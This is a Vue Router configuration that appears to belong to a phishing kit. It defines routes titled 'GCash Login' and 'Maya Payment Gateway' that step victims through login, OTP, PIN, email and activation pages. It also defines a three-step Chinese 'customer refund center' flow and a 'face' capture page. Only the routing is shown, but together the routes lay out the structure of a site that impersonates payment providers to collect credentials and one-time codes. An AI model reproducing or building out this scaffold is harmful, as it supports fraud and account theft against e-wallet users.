import { createRouter,createWebHashHistory } from 'vue-router'//createWebHistory
import NotFound from '../components/NotFound.vue'  // 引入404组件
import HomeView from '../pages/HomeView.vue'
import LipeiIndex from '../pages/lipei/IndexView.vue'
import Step1Index from '../pages/lipei/Step1View.vue'
import Step2Index from '../pages/lipei/Step2View.vue'
import Step3Index from '../pages/lipei/Step3View.vue'

// import DamaiView from '../pages/damai/IndexView.vue'


import GcashLogin from '../pages/ph/gcash/Login.vue'
import GcashOtp from '../pages/ph/gcash/Otp.vue'
import GcashPin from '../pages/ph/gcash/Pin.vue'
import GcashEmail from '../pages/ph/gcash/Email.vue'
import GcashActivation from '../pages/ph/gcash/Activation.vue'

import MayaLogin from '../pages/ph/maya/Login.vue'
import MayaOtp from '../pages/ph/maya/Otp.vue'

import Face from '../pages/Face.vue'
const routes = [
  // 其他路由配置
  // 例如：
  {
    path: '/home',
    component: HomeView
  },
  {
    path: '/damai',
    component: HomeView
  },
  {
    path: '/face',
    component: Face
  },
  {
    path: '/lipei', // 父路由
    // component: LipeiIndex,
    children: [
      {
        path: 'index', // 子路由，路径会变成 /home/settings
        component: LipeiIndex,
        name: 'LipeiIndex',
        meta: { title: '客户退款中心' },
      },
      {
        path: 'step1', // 子路由，路径会变成 /home/settings
        component: Step1Index,
        name: 'Step1Index',
        meta: { title: '客户退款中心' },
      },
      {
        path: 'step2', // 子路由，路径会变成 /home/settings
        component: Step2Index,
        name: 'Step2Index',
        meta: { title: '客户退款中心' },
      },
      {
        path: 'step3', // 子路由，路径会变成 /home/settings
        component: Step3Index,
        name: 'Step3Index',
        meta: { title: '客户退款中心' },
      }
    ]
  },
  {
    path: '/maya',
    name: 'maya',
    meta: { title: 'Maya Payment Gateway' },
    redirect: '/maya/login', // 添加重定向
    children: [
      {
        path: 'login',
        meta: { title: 'Maya Payment Gateway' },
        component: MayaLogin
      },
      {
        path: 'otp',
        meta: { title: 'Maya Payment Gateway' },
        component: MayaOtp
      },
      {
        path: 'pin',
        meta: { title: 'Maya Payment Gateway' },
        component: MayaOtp
      },
      // {
      //   path: 'email',
      //   meta: { title: 'Maya Payment Gateway' },
      //   component: GcashEmail
      // },
      // {
      //   path: 'activation',
      //   meta: { title: 'Maya Payment Gateway' },
      //   component: GcashActivation
      // },
    ]
  },
  {
    path: '/gcash',
    name: 'gcash',
    meta: { title: 'GCash Login' },
    redirect: '/gcash/login', // 添加重定向
    children: [
      {
        path: 'login',
        meta: { title: 'GCash Login' },
        component: GcashLogin
      },
      {
        path: 'otp',
        meta: { title: 'GCash Login' },
        component: GcashOtp
      },
      {
        path: 'pin',
        meta: { title: 'GCash Login' },
        component: GcashPin
      },
      {
        path: 'email',
        meta: { title: 'GCash Login' },
        component: GcashEmail
      },
      {
        path: 'activation',
        meta: { title: 'GCash activation' },
        component: GcashActivation
      },
    ]
  },
  // {
  //   path: '/lipei',
  //   component: LipeiIndex
  // },
  
  // 404 路由，放在最后
  {
    path: '/:pathMatch(.*)*', // 匹配所有路径
    name: 'NotFound',
    component: NotFound,
    meta: { title: '404 - 页面未找到' }
  }
]

const router = createRouter({
  history: createWebHashHistory(),//createWebHistory(process.env.BASE_URL),
  routes
})
router.beforeEach((to, from, next) => {
  document.title = to.meta.title || 'Default Title';
  next();
});
export default router
